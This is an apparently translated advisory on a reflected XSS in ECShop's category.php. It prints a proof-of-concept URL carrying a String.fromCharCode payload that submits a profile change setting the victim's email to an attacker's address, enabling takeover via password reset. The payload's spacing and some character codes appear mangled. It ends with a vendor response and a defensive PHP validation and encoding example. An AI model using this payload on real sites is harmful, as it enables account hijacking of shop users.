ECShop currently contains a reflected XSS vulnerability that can be exploited on its own. If a site's custom (secondary-development) code has additional XSS or CSRF problems, even more becomes possible. (I was slightly affected by this problem myself.)
The XSS is used to construct a POST request that submits a profile modification, changing the account's e-mail address to one the attacker controls, after which the password can be retrieved through the password-reset flow.
Proof of vulnerability:
Http: // localhost/test/ecshop_gbk272/category. php? Id = 3 & price_min = 0 & price_max = 0 & filter_attr = 0.0.0.199% 22% 3E % 3 Cscript % 3 Eeval % 28String. fromCharCode % 28120,61, 110,101,119, 72,116,116,112, 82,101,113,117,101,115,116, 59,120, 46,111,112,101,110, 112,111,115,116, 34,104,116,116,112, 47,108,111, 108,104,111,115,116, 47,116,101,115,116, 47,101, 99,115,104,111,112, 95,103, 98,107, 117,115,101,114, 46,112,104,112, 59,120, 46,115,101,116, 82,101,113,117,101,115,116, 72,101, 97,100,101,114, 67,111,110,116,101,110,116, 121,112,101, 112,112,108,105, 116,105,111,110, 47,120, 45,119,119,119, 45,102,111,114,109, 45,117,114,108,101,110, 99,111,100,101,100, 59,120, 46,115,101,110,100, 101,100,105,116, 95,112,114,111,102,105,108,101, 38,101,109, 97,105,108, 61,120,120,120, 64, 49, 54,51, 111,109, 59%, 29%, 29%, 3C/script % 3E % 3C % 22
Of course, it is more concise to use the file-inclusion approach, loading the script from a file rather than building it inline with String.fromCharCode.
Vendor response:
Filtering is lax and is being fixed.
Patch already released: http://bbs.ecshop.com/thread-137475-1-2.html
Encode and decode the URL to remove unnecessary parameters.
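As an added illustration of the vendor's fix (not ECShop's own code), the following PHP hardens the handling of the category.php filter_attr parameter that the advisory shows being reflected unescaped: the value is validated against the dot-separated-integer shape it is supposed to have, and every dynamic value is encoded for the HTML-attribute context when the filter link is built. The function names, the attr_count parameter and the sample inputs are assumptions for the example.

```php
<?php
// Added example, not ECShop's own code: hardening the category.php
// "filter_attr" parameter. Two layers are applied: strict input validation
// (filter_attr is a dot-separated list of integers such as "0.0.0.199") and
// context-aware output encoding wherever the value is echoed into HTML.

/**
 * Return a canonical filter_attr value, or the safe default "0".
 * Anything that is not purely digits and dots (quotes, angle brackets,
 * percent-encoded script tags, ...) is rejected, so a hostile value never
 * reaches the output stage at all. $attr_count is assumed to be the number
 * of filterable attributes the current category has.
 */
function normalize_filter_attr(?string $raw, int $attr_count): string
{
    if ($raw === null || !preg_match('/^\d+(\.\d+)*$/', $raw)) {
        return '0';
    }
    $parts = array_map('intval', explode('.', $raw));
    // Pad or truncate to the number of attributes the category actually has.
    $parts = array_slice(array_pad($parts, $attr_count, 0), 0, $attr_count);
    return implode('.', $parts);
}

/**
 * Build the filter link the way a template would. http_build_query
 * URL-encodes each value, and htmlspecialchars with ENT_QUOTES makes the
 * result safe inside a double- or single-quoted HTML attribute.
 */
function build_filter_url(int $cat_id, string $filter_attr): string
{
    $query = http_build_query([
        'id'          => $cat_id,
        'price_min'   => 0,
        'price_max'   => 0,
        'filter_attr' => $filter_attr,
    ]);
    return htmlspecialchars('category.php?' . $query, ENT_QUOTES, 'UTF-8');
}

// Constructed inputs: a legitimate value and one that tries to break out of
// the attribute the way the advisory's payload does. The second is reduced
// to the default "0" by validation; even if it slipped through, the encoding
// in build_filter_url would keep it inert in the attribute context.
$good = normalize_filter_attr('0.0.0.199', 4);
$bad  = normalize_filter_attr('0.0.0.199"><script>', 4);
echo '<a href="' . build_filter_url(3, $good) . '">filter</a>', PHP_EOL;
echo '<a href="' . build_filter_url(3, $bad) . '">filter</a>', PHP_EOL;
```

Validation alone is the vendor's stated approach; the output encoding is the defence-in-depth layer that protects any other template that echoes the same parameter.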